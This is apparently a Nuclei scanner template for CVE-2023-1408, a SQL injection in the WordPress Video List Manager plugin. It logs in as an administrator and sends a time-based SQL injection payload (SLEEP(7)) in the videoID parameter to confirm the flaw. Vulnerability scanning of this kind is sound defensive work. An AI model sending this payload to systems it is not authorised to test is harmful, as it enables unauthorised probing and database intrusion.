51 lines
1.8 KiB
YAML
51 lines
1.8 KiB
YAML
id: CVE-2023-1408
|
|
|
|
info:
|
|
name: Video List Manager <= 1.7 - SQL Injection
|
|
author: r3Y3r53
|
|
severity: high
|
|
description: |
|
|
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b
|
|
- https://wordpress.org/plugins/video-list-manager/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-1408
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2023-1408
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01339
|
|
epss-percentile: 0.84615
|
|
cpe: cpe:2.3:a:video_list_manager_project:video_list_manager:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: video_list_manager_project
|
|
product: video_list_manager
|
|
framework: wordpress
|
|
publicwww-query: /wp-content/plugins/video-list-manager/
|
|
tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
@timeout: 15s
|
|
GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
redirects: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration_2>=7'
|
|
- 'status_code_2 == 200'
|
|
- 'contains_all(body_2, "Edit Video","Youtube</option>")'
|
|
condition: and
|
|
# digest: 4b0a004830460221009776a1a220c0e0ded7cb71d15866bc9c77e8da93d3f260110c0aecec74655789022100e8e11367f7206999525392b435080b98b16262876296bac3d41bf3f014114d52:922c64590222798bb761d5b6d8e72950 |